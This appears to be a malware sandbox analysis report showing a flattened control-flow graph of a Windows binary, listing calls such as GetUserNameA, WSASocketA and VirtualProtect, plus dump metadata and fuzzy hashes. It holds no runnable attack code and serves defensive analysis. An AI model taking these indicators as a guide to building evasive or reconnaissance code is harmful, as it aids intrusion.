2b66a0c97dc 16767->16768 16769 2b66a0c9870 _callnewh 16768->16769 16775 2b66a0c97f4 _callnewh _mtinitlocknum 16768->16775 16770 2b66a0cbfd0 _errno RtlFreeHeap 16769->16770 16772 2b66a0c9865 16770->16772 16772->16767 16774 2b66a0c9855 16804 2b66a0cbfd0 16774->16804 16775->16772 16775->16774 16777 2b66a0c985a 16775->16777 16779 2b66a0cc0a8 16775->16779 16788 2b66a0cc11c 16775->16788 16778 2b66a0cbfd0 _errno RtlFreeHeap 16777->16778 16778->16772 16807 2b66a0d31b4 16779->16807 16781 2b66a0cc0b6 16782 2b66a0cc0c5 16781->16782 16783 2b66a0d31b4 _set_error_mode RtlFreeHeap 16781->16783 16784 2b66a0cc11c _NMSG_WRITE RtlFreeHeap 16782->16784 16786 2b66a0cc0e6 16782->16786 16783->16782 16785 2b66a0cc0dc 16784->16785 16787 2b66a0cc11c _NMSG_WRITE RtlFreeHeap 16785->16787 16786->16775 16787->16786 16789 2b66a0cc150 _NMSG_WRITE 16788->16789 16790 2b66a0d31b4 _set_error_mode RtlFreeHeap 16789->16790 16798 2b66a0cc26d _setmbcp_nolock __crtMessageBoxW _invoke_watson 16789->16798 16791 2b66a0cc166 16790->16791 16792 2b66a0d31b4 _set_error_mode RtlFreeHeap 16791->16792 16791->16798 16793 2b66a0cc177 16792->16793 16793->16798 16811 2b66a0d3060 16793->16811 16795 2b66a0cc1b3 16796 2b66a0d3060 _NMSG_WRITE RtlFreeHeap 16795->16796 16797 2b66a0cc1f3 _NMSG_WRITE 16795->16797 16795->16798 16796->16797 16797->16798 16802 2b66a0cc23d 16797->16802 16818 2b66a0d30e8 16797->16818 16798->16775 16801 2b66a0cc257 16801->16798 16803 2b66a0d2fd8 _NMSG_WRITE RtlFreeHeap 16801->16803 16802->16798 16825 2b66a0d2fd8 16802->16825 16803->16798 16832 2b66a0cfbc8 16804->16832 16808 2b66a0d31bc 16807->16808 16809 2b66a0cbfd0 _errno RtlFreeHeap 16808->16809 16810 2b66a0d31c6 _invalid_parameter_noinfo 16808->16810 16809->16810 16810->16781 16812 2b66a0d306e 16811->16812 16813 2b66a0d3078 16811->16813 16812->16813 16816 2b66a0d3095 16812->16816 16814 2b66a0cbfd0 _errno RtlFreeHeap 16813->16814 16815 2b66a0d3081 _invalid_parameter_noinfo 16814->16815 16815->16795 16816->16815 16817 2b66a0cbfd0 _errno RtlFreeHeap 16816->16817 16817->16815 16822 2b66a0d30f5 16818->16822 16819 2b66a0d30fa 16820 2b66a0cbfd0 _errno RtlFreeHeap 16819->16820 16821 2b66a0d30ff _invalid_parameter_noinfo 16819->16821 16820->16821 16821->16802 16822->16819 16822->16821 16823 2b66a0d3138 16822->16823 16823->16821 16824 2b66a0cbfd0 _errno RtlFreeHeap 16823->16824 16824->16821 16826 2b66a0d2fe9 16825->16826 16828 2b66a0d2ff3 16825->16828 16826->16828 16830 2b66a0d302a 16826->16830 16827 2b66a0cbfd0 _errno RtlFreeHeap 16829 2b66a0d2ffc _invalid_parameter_noinfo 16827->16829 16828->16827 16829->16801 16830->16829 16831 2b66a0cbfd0 _errno RtlFreeHeap 16830->16831 16831->16829 16834 2b66a0cfbd8 _freeptd 16832->16834 16833 2b66a0cbfd9 16833->16777 16834->16833 16835 2b66a0cea88 _calloc_crt RtlFreeHeap 16834->16835 16836 2b66a0cfbfa _freeptd 16835->16836 16836->16833 16837 2b66a0cfc2d 16836->16837 16838 2b66a0cfc17 16836->16838 16840 2b66a0c979c free RtlFreeHeap 16837->16840 16839 2b66a0cfc4c _initptd RtlFreeHeap 16838->16839 16839->16833 16840->16833 16842 2b66a0ce10a 16841->16842 16844 2b66a0ce10f 16841->16844 16845 2b66a0ce1b8 16842->16845 16846 2b66a0ce1d5 16845->16846 16847 2b66a0ce1e4 _mtinitlocknum 16845->16847 16848 2b66a0cc0a8 _FF_MSGBANNER RtlFreeHeap 16846->16848 16849 2b66a0ce1ff 16847->16849 16851 2b66a0ceb08 _malloc_crt RtlFreeHeap 16847->16851 16850 2b66a0ce1da 16848->16850 16849->16844 16852 2b66a0cc11c _NMSG_WRITE RtlFreeHeap 16850->16852 16853 2b66a0ce210 16851->16853 16852->16847 16854 2b66a0ce227 16853->16854 16855 2b66a0ce218 16853->16855 16856 2b66a0ce0ec _lock RtlFreeHeap 16854->16856 16857 2b66a0cbfd0 _errno RtlFreeHeap 16855->16857 16858 2b66a0ce231 16856->16858 16857->16849 16858->16849 16859 2b66a0c979c free RtlFreeHeap 16858->16859 16859->16849 16976 2b66a0d3d05 16975->16976 16978 2b66a0d3d18 _callnewh 16975->16978 16977 2b66a0cbfd0 _errno RtlFreeHeap 16976->16977 16976->16978 16977->16978 16978->16751 16980 2b66a0cfa3d 16979->16980 17004 2b66a0cfb5c 16979->17004 16981 2b66a0cfa58 16980->16981 16982 2b66a0c979c free RtlFreeHeap 16980->16982 16984 2b66a0cfa66 16981->16984 16985 2b66a0c979c free RtlFreeHeap 16981->16985 16982->16981 16983 2b66a0cfa74 16987 2b66a0cfa82 16983->16987 16988 2b66a0c979c free RtlFreeHeap 16983->16988 16984->16983 16986 2b66a0c979c free RtlFreeHeap 16984->16986 16985->16984 16986->16983 16989 2b66a0cfa90 16987->16989 16990 2b66a0c979c free RtlFreeHeap 16987->16990 16988->16987 16991 2b66a0cfa9e 16989->16991 16992 2b66a0c979c free RtlFreeHeap 16989->16992 16990->16989 16993 2b66a0cfaaf 16991->16993 16994 2b66a0c979c free RtlFreeHeap 16991->16994 16992->16991 16995 2b66a0cfac7 16993->16995 16996 2b66a0c979c free RtlFreeHeap 16993->16996 16994->16993 16997 2b66a0ce0ec _lock RtlFreeHeap 16995->16997 16996->16995 16999 2b66a0cfad3 16997->16999 16998 2b66a0cfb00 __updatetlocinfo 17001 2b66a0ce0ec _lock RtlFreeHeap 16998->17001 16999->16998 17000 2b66a0c979c free RtlFreeHeap 16999->17000 17000->16998 17002 2b66a0cfb12 __updatetlocinfo _updatetlocinfoEx_nolock 17001->17002 17003 2b66a0c979c free RtlFreeHeap 17002->17003 17003->17004 17004->16761 17047 2b66a0c316c 17005->17047 17007 2b66a0bba92 _DllMainCRTStartup 17008 2b66a0c97dc malloc RtlFreeHeap 17007->17008 17009 2b66a0bbb23 _DllMainCRTStartup 17008->17009 17054 2b66a0c91b4 17009->17054 17011 2b66a0bbb81 17012 2b66a0c91b4 _DllMainCRTStartup RtlFreeHeap 17011->17012 17013 2b66a0bbb9b _DllMainCRTStartup 17012->17013 17015 2b66a0bbba9 _DllMainCRTStartup 17013->17015 17077 2b66a0c8910 17013->17077 17016 2b66a0bbbb7 17015->17016 17017 2b66a0c8910 _DllMainCRTStartup RtlFreeHeap 17015->17017 17061 2b66a0bd744 17016->17061 17017->17016 17020 2b66a0c8910 _DllMainCRTStartup RtlFreeHeap 17021 2b66a0bbbc5 _DllMainCRTStartup 17020->17021 17022 2b66a0c97dc malloc RtlFreeHeap 17021->17022 17023 2b66a0bbbf2 17022->17023 17024 2b66a0bbbff _DllMainCRTStartup 17023->17024 17025 2b66a0c8910 _DllMainCRTStartup RtlFreeHeap 17023->17025 17026 2b66a0c91b4 _DllMainCRTStartup RtlFreeHeap 17024->17026 17025->17024 17027 2b66a0bbc1c _DllMainCRTStartup 17026->17027 17067 2b66a0c2de0 17027->17067 17048 2b66a0c97dc malloc RtlFreeHeap 17047->17048 17049 2b66a0c318d 17048->17049 17050 2b66a0c3195 _setmbcp_nolock _DllMainCRTStartup 17049->17050 17051 2b66a0c97dc malloc RtlFreeHeap 17049->17051 17050->17007 17052 2b66a0c31a1 17051->17052 17052->17050 17053 2b66a0c979c free RtlFreeHeap 17052->17053 17053->17050 17055 2b66a0c91f3 17054->17055 17060 2b66a0c9209 _setmbcp_nolock 17054->17060 17056 2b66a0c91ff 17055->17056 17057 2b66a0c920b 17055->17057 17058 2b66a0c97dc malloc RtlFreeHeap 17056->17058 17059 2b66a0cbbcc realloc RtlFreeHeap 17057->17059 17058->17060 17059->17060 17060->17011 17063 2b66a0bd75d _DllMainCRTStartup 17061->17063 17062 2b66a0bbbbc 17062->17020 17062->17021 17063->17062 17081 2b66a0c744c 17063->17081 17065 2b66a0bd791 17086 2b66a0c7478 17065->17086 17068 2b66a0c2dfe _DllMainCRTStartup 17067->17068 17249 2b66a0c7c08 17068->17249 17070 2b66a0c2e28 17253 2b66a0ca9ac 17070->17253 17072 2b66a0c2e3f _DllMainCRTStartup 17256 2b66a0c2fa8 17072->17256 17074 2b66a0c2f14 _setmbcp_nolock memcpy_s _DllMainCRTStartup 17265 2b66a0c7720 17074->17265 17076 2b66a0c2f75 17078 2b66a0c8924 _DllMainCRTStartup 17077->17078 17365 2b66a0c92ac 17078->17365 17082 2b66a0c745f 17081->17082 17083 2b66a0c7458 17081->17083 17091 2b66a0c76a8 17082->17091 17083->17065 17087 2b66a0c9b9c _snprintf RtlFreeHeap 17086->17087 17088 2b66a0c74ec 17087->17088 17089 2b66a0c9b9c _snprintf RtlFreeHeap 17088->17089 17090 2b66a0c7502 _DllMainCRTStartup 17089->17090 17090->17062 17098 2b66a0c9b9c 17091->17098 17093 2b66a0c76c5 17094 2b66a0c9b9c _snprintf RtlFreeHeap 17093->17094 17095 2b66a0c7710 17094->17095 17107 2b66a0ca364 17095->17107 17101 2b66a0c9bce _setmbcp_nolock 17098->17101 17099 2b66a0c9bd3 17102 2b66a0cbfd0 _errno RtlFreeHeap 17099->17102 17100 2b66a0c9bf2 17111 2b66a0cc888 17100->17111 17101->17099 17101->17100 17105 2b66a0c9bd8 _invalid_parameter_noinfo 17102->17105 17104 2b66a0c9c22 17104->17105 17128 2b66a0cc654 17104->17128 17105->17093 17108 2b66a0ce04c 17107->17108 17232 2b66a0cde10 17108->17232 17110 2b66a0c7464 17110->17065 17112 2b66a0cc7e0 _LocaleUpdate::_LocaleUpdate RtlFreeHeap 17111->17112 17113 2b66a0cc8ee 17112->17113 17114 2b66a0cbfd0 _errno RtlFreeHeap 17113->17114 17115 2b66a0cc8f3 17114->17115 17116 2b66a0cd253 17115->17116 17127 2b66a0cc920 _snprintf 17115->17127 17149 2b66a0cfdb4 17115->17149 17117 2b66a0cbfd0 _errno RtlFreeHeap 17116->17117 17119 2b66a0cd258 _invalid_parameter_noinfo _setmbcp_nolock 17117->17119 17119->17104 17121 2b66a0cd2a8 RtlFreeHeap write_char 17121->17127 17122 2b66a0c979c free RtlFreeHeap 17122->17127 17123 2b66a0cd2f0 RtlFreeHeap write_string 17123->17127 17124 2b66a0d3af4 RtlFreeHeap _snprintf 17124->17127 17125 2b66a0ceb08 _malloc_crt RtlFreeHeap 17125->17127 17126 2b66a0cddbc RtlFreeHeap write_multi_char 17126->17127 17127->17116 17127->17119 17127->17121 17127->17122 17127->17123 17127->17124 17127->17125 17127->17126 17153 2b66a0d38c4 17127->17153 17129 2b66a0cfdb4 _fileno RtlFreeHeap 17128->17129 17130 2b66a0cc676 17129->17130 17131 2b66a0cc681 17130->17131 17132 2b66a0cc698 17130->17132 17133 2b66a0cbfd0 _errno RtlFreeHeap 17131->17133 17134 2b66a0cc6aa _snprintf 17132->17134 17135 2b66a0cc69d 17132->17135 17144 2b66a0cc686 17133->17144 17137 2b66a0cc70f 17134->17137 17134->17144 17146 2b66a0cc703 17134->17146 17156 2b66a0d346c 17134->17156 17136 2b66a0cbfd0 _errno RtlFreeHeap 17135->17136 17136->17144 17138 2b66a0cc71c 17137->17138 17139 2b66a0cc7a7 17137->17139 17140 2b66a0cc738 17138->17140 17143 2b66a0cc751 17138->17143 17141 2b66a0d0794 _flush RtlFreeHeap 17139->17141 17165 2b66a0d0794 17140->17165 17141->17144 17143->17144 17182 2b66a0d1f68 17143->17182 17144->17105 17146->17137 17162 2b66a0d34cc 17146->17162 17150 2b66a0cfdbd 17149->17150 17152 2b66a0cfdc2 _invalid_parameter_noinfo 17149->17152 17151 2b66a0cbfd0 _errno RtlFreeHeap 17150->17151 17151->17152 17152->17127 17154 2b66a0cc7e0 _LocaleUpdate::_LocaleUpdate RtlFreeHeap 17153->17154 17155 2b66a0d38d6 17154->17155 17155->17127 17157 2b66a0d3482 17156->17157 17158 2b66a0d3475 17156->17158 17160 2b66a0cbfd0 _errno RtlFreeHeap 17157->17160 17161 2b66a0d347a _invalid_parameter_noinfo 17157->17161 17159 2b66a0cbfd0 _errno RtlFreeHeap 17158->17159 17159->17161 17160->17161 17161->17146 17163 2b66a0ceb08 _malloc_crt RtlFreeHeap 17162->17163 17164 2b66a0d34e5 17163->17164 17164->17137 17166 2b66a0d07b7 17165->17166 17170 2b66a0d07cf 17165->17170 17202 2b66a0cbf60 17166->17202 17168 2b66a0d0846 17171 2b66a0cbf60 __doserrno RtlFreeHeap 17168->17171 17170->17168 17173 2b66a0d0801 17170->17173 17174 2b66a0d084b 17171->17174 17172 2b66a0cbfd0 _errno RtlFreeHeap 17181 2b66a0d07c4 _invalid_parameter_noinfo _unlock_fhandle 17172->17181 17205 2b66a0d461c 17173->17205 17176 2b66a0cbfd0 _errno RtlFreeHeap 17174->17176 17176->17181 17177 2b66a0d0808 17178 2b66a0cbfd0 _errno RtlFreeHeap 17177->17178 17177->17181 17179 2b66a0d082a 17178->17179 17180 2b66a0cbf60 __doserrno RtlFreeHeap 17179->17180 17180->17181 17181->17144 17183 2b66a0d1fa3 17182->17183 17184 2b66a0d1f8b 17182->17184 17186 2b66a0d201d 17183->17186 17190 2b66a0d1fd5 17183->17190 17185 2b66a0cbf60 __doserrno RtlFreeHeap 17184->17185 17188 2b66a0d1f90 17185->17188 17187 2b66a0cbf60 __doserrno RtlFreeHeap 17186->17187 17189 2b66a0d2022 17187->17189 17191 2b66a0cbfd0 _errno RtlFreeHeap 17188->17191 17192 2b66a0cbfd0 _errno RtlFreeHeap 17189->17192 17193 2b66a0d461c __lock_fhandle RtlFreeHeap 17190->17193 17194 2b66a0d1f98 _invalid_parameter_noinfo _unlock_fhandle 17191->17194 17192->17194 17195 2b66a0d1fdc 17193->17195 17194->17144 17196 2b66a0d1ffa 17195->17196 17197 2b66a0d1fe8 17195->17197 17199 2b66a0cbfd0 _errno RtlFreeHeap 17196->17199 17209 2b66a0d204c 17197->17209 17200 2b66a0d1fff 17199->17200 17201 2b66a0cbf60 __doserrno RtlFreeHeap 17200->17201 17201->17194 17203 2b66a0cfbc8 _getptd_noexit RtlFreeHeap 17202->17203 17204 2b66a0cbf69 17203->17204 17204->17172 17206 2b66a0d4654 17205->17206 17208 2b66a0d465e __updatetlocinfo 17205->17208 17207 2b66a0ce0ec _lock RtlFreeHeap 17206->17207 17207->17208 17208->17177 17217 2b66a0d4958 17209->17217 17211 2b66a0d206b 17212 2b66a0d2082 17211->17212 17213 2b66a0d2071 17211->17213 17215 2b66a0d2076 17212->17215 17227 2b66a0cbf80 17212->17227 17214 2b66a0cbfd0 _errno RtlFreeHeap 17213->17214 17214->17215 17215->17194 17218 2b66a0d4961 17217->17218 17221 2b66a0d4976 17217->17221 17219 2b66a0cbf60 __doserrno RtlFreeHeap 17218->17219 17220 2b66a0d4966 17219->17220 17223 2b66a0cbfd0 _errno RtlFreeHeap 17220->17223 17222 2b66a0cbf60 __doserrno RtlFreeHeap 17221->17222 17226 2b66a0d496e _invalid_parameter_noinfo 17221->17226 17224 2b66a0d49b0 17222->17224 17223->17226 17225 2b66a0cbfd0 _errno RtlFreeHeap 17224->17225 17225->17226 17226->17211 17228 2b66a0cfbc8 _getptd_noexit RtlFreeHeap 17227->17228 17229 2b66a0cbf91 17228->17229 17230 2b66a0cfbc8 _getptd_noexit RtlFreeHeap 17229->17230 17231 2b66a0cbfaa realloc 17230->17231 17231->17215 17233 2b66a0cc7e0 _LocaleUpdate::_LocaleUpdate RtlFreeHeap 17232->17233 17236 2b66a0cde3c 17233->17236 17234 2b66a0cde57 17235 2b66a0cbfd0 _errno RtlFreeHeap 17234->17235 17241 2b66a0cde5c _invalid_parameter_noinfo 17235->17241 17236->17234 17238 2b66a0cde6c 17236->17238 17239 2b66a0cdebe 17238->17239 17242 2b66a0d3b08 17238->17242 17240 2b66a0cbfd0 _errno RtlFreeHeap 17239->17240 17239->17241 17240->17241 17241->17110 17243 2b66a0cc7e0 _LocaleUpdate::_LocaleUpdate RtlFreeHeap 17242->17243 17244 2b66a0d3b2a 17243->17244 17245 2b66a0d38c4 _isleadbyte_l RtlFreeHeap 17244->17245 17248 2b66a0d3b34 17244->17248 17246 2b66a0d3b57 17245->17246 17247 2b66a0d44f8 __crtGetStringTypeA RtlFreeHeap 17246->17247 17247->17248 17248->17238 17250 2b66a0c7c25 _DllMainCRTStartup 17249->17250 17271 2b66a0b08bc 17250->17271 17252 2b66a0c7c56 _DllMainCRTStartup 17252->17070 17254 2b66a0cfba4 _getptd RtlFreeHeap 17253->17254 17255 2b66a0ca9b9 17254->17255 17255->17072 17257 2b66a0c316c _DllMainCRTStartup RtlFreeHeap 17256->17257 17258 2b66a0c2fd1 _DllMainCRTStartup 17257->17258 17259 2b66a0c301f GetUserNameA 17258->17259 17260 2b66a0c3048 17259->17260 17277 2b66a0bd570 17260->17277 17262 2b66a0c304d strrchr _DllMainCRTStartup 17263 2b66a0c9b9c _snprintf RtlFreeHeap 17262->17263 17264 2b66a0c3120 _DllMainCRTStartup 17263->17264 17264->17074 17266 2b66a0c7752 memcpy_s _DllMainCRTStartup 17265->17266 17266->17266 17286 2b66a0b0cc4 17266->17286 17268 2b66a0c780e 17270 2b66a0c785d 17268->17270 17306 2b66a0b0b64 17268->17306 17270->17076 17272 2b66a0b08ec _DllMainCRTStartup 17271->17272 17273 2b66a0c97dc malloc RtlFreeHeap 17272->17273 17274 2b66a0b090d 17272->17274 17275 2b66a0b0921 17273->17275 17274->17252 17275->17274 17276 2b66a0c979c free RtlFreeHeap 17275->17276 17276->17274 17284 2b66a0bd668 17277->17284 17279 2b66a0bd58b WSASocketA 17280 2b66a0bd5b4 WSAIoctl 17279->17280 17281 2b66a0bd5ad 17279->17281 17283 2b66a0bd5f5 closesocket 17280->17283 17281->17262 17283->17281 17285 2b66a0bd67c _DllMainCRTStartup 17284->17285 17285->17279 17287 2b66a0b0d5e _DllMainCRTStartup 17286->17287 17289 2b66a0b0d77 _setmbcp_nolock _DllMainCRTStartup 17287->17289 17310 2b66a0d92c8 17287->17310 17289->17268 17290 2b66a0b0d6f _DllMainCRTStartup 17290->17289 17291 2b66a0b0f0c 17290->17291 17293 2b66a0b0e6d 17290->17293 17292 2b66a0c979c free RtlFreeHeap 17291->17292 17294 2b66a0b0f14 17292->17294 17317 2b66a0b3e64 17293->17317 17297 2b66a0b3e64 _DllMainCRTStartup RtlFreeHeap 17294->17297 17302 2b66a0b0f40 17297->17302 17298 2b66a0b0ef3 17300 2b66a0c979c free RtlFreeHeap 17298->17300 17299 2b66a0b0efd 17301 2b66a0c979c free RtlFreeHeap 17299->17301 17300->17289 17301->17289 17302->17289 17304 2b66a0b3e64 _DllMainCRTStartup RtlFreeHeap 17302->17304 17305 2b66a0b105c 17302->17305 17303 2b66a0b3e64 _DllMainCRTStartup RtlFreeHeap 17303->17289 17304->17305 17305->17289 17305->17303 17307 2b66a0b0ba5 _DllMainCRTStartup 17306->17307 17309 2b66a0b0b9b _DllMainCRTStartup 17306->17309 17307->17309 17323 2b66a0b360c 17307->17323 17309->17270 17311 2b66a0d3cf0 _calloc_impl RtlFreeHeap 17310->17311 17312 2b66a0d92dd 17311->17312 17313 2b66a0d92fa 17312->17313 17314 2b66a0cbfd0 _errno RtlFreeHeap 17312->17314 17313->17290 17315 2b66a0d92f0 17314->17315 17315->17313 17316 2b66a0cbfd0 _errno RtlFreeHeap 17315->17316 17316->17313 17318 2b66a0b3e90 17317->17318 17319 2b66a0b0eea 17318->17319 17320 2b66a0d92c8 _DllMainCRTStartup RtlFreeHeap 17318->17320 17319->17298 17319->17299 17321 2b66a0b3ecf _DllMainCRTStartup 17320->17321 17321->17319 17322 2b66a0c979c free RtlFreeHeap 17321->17322 17322->17319 17324 2b66a0b363d _DllMainCRTStartup 17323->17324 17325 2b66a0c97dc malloc RtlFreeHeap 17324->17325 17336 2b66a0b3893 17324->17336 17326 2b66a0b36ae 17325->17326 17327 2b66a0c97dc malloc RtlFreeHeap 17326->17327 17328 2b66a0b36b8 17327->17328 17329 2b66a0c97dc malloc RtlFreeHeap 17328->17329 17331 2b66a0b36c3 17329->17331 17330 2b66a0b389f 17332 2b66a0b38ac 17330->17332 17335 2b66a0c979c free RtlFreeHeap 17330->17335 17331->17330 17333 2b66a0b3897 17331->17333 17337 2b66a0b36e1 17331->17337 17332->17336 17338 2b66a0c979c free RtlFreeHeap 17332->17338 17334 2b66a0c979c free RtlFreeHeap 17333->17334 17334->17330 17335->17332 17336->17309 17339 2b66a0b08bc _DllMainCRTStartup RtlFreeHeap 17337->17339 17338->17336 17345 2b66a0b3723 _setmbcp_nolock memcpy_s 17339->17345 17340 2b66a0c979c free RtlFreeHeap 17341 2b66a0b3883 17340->17341 17342 2b66a0c979c free RtlFreeHeap 17341->17342 17343 2b66a0b388b 17342->17343 17344 2b66a0c979c free RtlFreeHeap 17343->17344 17344->17336 17349 2b66a0b3797 memcpy_s 17345->17349 17350 2b66a0b44f0 17345->17350 17347 2b66a0b37bf 17347->17347 17348 2b66a0b44f0 _DllMainCRTStartup RtlFreeHeap 17347->17348 17347->17349 17348->17349 17349->17340 17351 2b66a0b451c _DllMainCRTStartup 17350->17351 17352 2b66a0b4639 17351->17352 17353 2b66a0c97dc malloc RtlFreeHeap 17351->17353 17352->17347 17354 2b66a0b453f 17353->17354 17355 2b66a0c97dc malloc RtlFreeHeap 17354->17355 17356 2b66a0b454a 17355->17356 17357 2b66a0b4645 17356->17357 17358 2b66a0b463d 17356->17358 17364 2b66a0b455f 17356->17364 17357->17352 17360 2b66a0c979c free RtlFreeHeap 17357->17360 17359 2b66a0c979c free RtlFreeHeap 17358->17359 17359->17357 17360->17352 17361 2b66a0c979c free RtlFreeHeap 17362 2b66a0b4631 17361->17362 17363 2b66a0c979c free RtlFreeHeap 17362->17363 17363->17352 17364->17361 17366 2b66a0c933c 17365->17366 17371 2b66a0c92c6 _setmbcp_nolock 17365->17371 17367 2b66a0c934d 17366->17367 17368 2b66a0c979c free RtlFreeHeap 17366->17368 17369 2b66a0c8939 17367->17369 17370 2b66a0c979c free RtlFreeHeap 17367->17370 17368->17367 17370->17369 17371->17366 17372 2b66a0c979c free RtlFreeHeap 17371->17372 17372->17371 17373 2b66a0d3cf0 17374 2b66a0d3d05 17373->17374 17376 2b66a0d3d18 _callnewh 17373->17376 17375 2b66a0cbfd0 _errno RtlFreeHeap 17374->17375 17374->17376 17375->17376 17377 7ff7ad0413d0 17380 7ff7ad041180 17377->17380 17379 7ff7ad0413e6 17381 7ff7ad0411b0 17380->17381 17382 7ff7ad0411b9 Sleep 17381->17382 17383 7ff7ad0411cd 17381->17383 17382->17381 17384 7ff7ad04134c _initterm 17383->17384 17385 7ff7ad041200 17383->17385 17389 7ff7ad0412ee 17383->17389 17384->17385 17395 7ff7ad041f00 17385->17395 17387 7ff7ad041228 SetUnhandledExceptionFilter 17388 7ff7ad04124b 17387->17388 17390 7ff7ad041250 malloc 17388->17390 17389->17379 17390->17389 17391 7ff7ad04127a 17390->17391 17392 7ff7ad041280 strlen malloc memcpy 17391->17392 17392->17392 17393 7ff7ad0412b2 17392->17393 17417 7ff7ad0480d0 17393->17417 17397 7ff7ad041f38 17395->17397 17416 7ff7ad041f21 17395->17416 17396 7ff7ad042210 17398 7ff7ad042219 17396->17398 17396->17416 17397->17396 17399 7ff7ad04212e 17397->17399 17410 7ff7ad041fb2 17397->17410 17397->17416 17402 7ff7ad04223d 17398->17402 17448 7ff7ad041d90 17398->17448 17399->17402 17407 7ff7ad042149 17399->17407 17400 7ff7ad04224e 17403 7ff7ad041d20 8 API calls 17400->17403 17404 7ff7ad041d20 8 API calls 17402->17404 17405 7ff7ad04225a 17403->17405 17404->17400 17405->17387 17406 7ff7ad041d90 8 API calls 17408 7ff7ad04215a 17406->17408 17407->17408 17408->17406 17408->17407 17420 7ff7ad041d20 17408->17420 17410->17399 17410->17400 17410->17402 17410->17407 17410->17408 17411 7ff7ad042010 17410->17411 17410->17416 17411->17408 17411->17410 17412 7ff7ad041d90 8 API calls 17411->17412 17413 7ff7ad0420b8 17411->17413 17415 7ff7ad0420c0 17411->17415 17412->17411 17413->17415 17414 7ff7ad0420f2 VirtualProtect 17414->17415 17415->17414 17415->17416 17416->17387 17418 7ff7ad0480db 17417->17418 17419 7ff7ad0480f0 GetCurrentProcess WaitForSingleObject 17418->17419 17419->17419 17426 7ff7ad041d4c 17420->17426 17421 7ff7ad041e5e 17421->17408 17422 7ff7ad041ee2 17423 7ff7ad041d20 4 API calls 17422->17423 17432 7ff7ad041ef1 17423->17432 17424 7ff7ad041e1d VirtualQuery 17425 7ff7ad041ec7 17424->17425 17424->17426 17428 7ff7ad041d20 4 API calls 17425->17428 17426->17421 17426->17422 17426->17424 17429 7ff7ad041e70 VirtualProtect 17426->17429 17427 7ff7ad041f21 17427->17408 17428->17422 17429->17421 17430 7ff7ad041ea8 GetLastError 17429->17430 17431 7ff7ad041d20 4 API calls 17430->17431 17431->17426 17432->17427 17433 7ff7ad04212e 17432->17433 17438 7ff7ad042210 17432->17438 17444 7ff7ad041fb2 17432->17444 17436 7ff7ad04223d 17433->17436 17442 7ff7ad042149 17433->17442 17434 7ff7ad04224e 17437 7ff7ad041d20 4 API calls 17434->17437 17435 7ff7ad041d90 4 API calls 17435->17438 17439 7ff7ad041d20 4 API calls 17436->17439 17440 7ff7ad04225a 17437->17440 17438->17427 17438->17435 17438->17436 17439->17434 17440->17408 17441 7ff7ad041d20 4 API calls 17441->17442 17442->17441 17443 7ff7ad041d90 VirtualQuery VirtualProtect GetLastError VirtualProtect 17442->17443 17443->17442 17444->17427 17444->17433 17444->17434 17444->17436 17444->17442 17445 7ff7ad041d90 VirtualQuery VirtualProtect GetLastError VirtualProtect 17444->17445 17446 7ff7ad0420b8 17444->17446 17445->17444 17446->17427 17447 7ff7ad0420f2 VirtualProtect 17446->17447 17447->17446 17453 7ff7ad041da9 17448->17453 17449 7ff7ad041e5e 17449->17398 17450 7ff7ad041ee2 17451 7ff7ad041d20 4 API calls 17450->17451 17459 7ff7ad041ef1 17451->17459 17452 7ff7ad041e1d VirtualQuery 17452->17453 17454 7ff7ad041ec7 17452->17454 17453->17449 17453->17450 17453->17452 17456 7ff7ad041e70 VirtualProtect 17453->17456 17455 7ff7ad041d20 4 API calls 17454->17455 17455->17450 17456->17449 17457 7ff7ad041ea8 GetLastError 17456->17457 17458 7ff7ad041d20 4 API calls 17457->17458 17458->17453 17460 7ff7ad04212e 17459->17460 17461 7ff7ad041fb2 17459->17461 17466 7ff7ad042210 17459->17466 17475 7ff7ad041f21 17459->17475 17464 7ff7ad04223d 17460->17464 17469 7ff7ad042149 17460->17469 17461->17460 17462 7ff7ad04224e 17461->17462 17461->17464 17461->17469 17472 7ff7ad041d90 VirtualQuery VirtualProtect GetLastError VirtualProtect 17461->17472 17474 7ff7ad0420b8 17461->17474 17461->17475 17465 7ff7ad041d20 4 API calls 17462->17465 17463 7ff7ad041d90 4 API calls 17463->17466 17467 7ff7ad041d20 4 API calls 17464->17467 17468 7ff7ad04225a 17465->17468 17466->17463 17466->17464 17466->17475 17467->17462 17468->17398 17470 7ff7ad041d20 4 API calls 17469->17470 17471 7ff7ad041d90 VirtualQuery VirtualProtect GetLastError VirtualProtect 17469->17471 17470->17469 17471->17469 17472->17461 17473 7ff7ad0420f2 VirtualProtect 17473->17474 17474->17473 17474->17475 17475->17398

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual$AddressCacheCurrentFlushHandleInstructionModuleProcProcess
                                  • String ID: NtFlushInstructionCache$ntdll
                                  • API String ID: 2917874169-2800261898
                                  • Opcode ID: 5a373afe036d417ece7b5d1f30bf6a75f63e927daf82d526c4cbf977ba0c1c6f
                                  • Instruction ID: 00925a3667ef46d21dbd77a451ef0aa1efe3f14b725bd2002c563004c632603b
                                  • Opcode Fuzzy Hash: 5a373afe036d417ece7b5d1f30bf6a75f63e927daf82d526c4cbf977ba0c1c6f
                                  • Instruction Fuzzy Hash: 90316F21A0EA5585E760AB12BD047ABB3A1FB88B84F864234ED4D53774FF3CE5A5C710

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
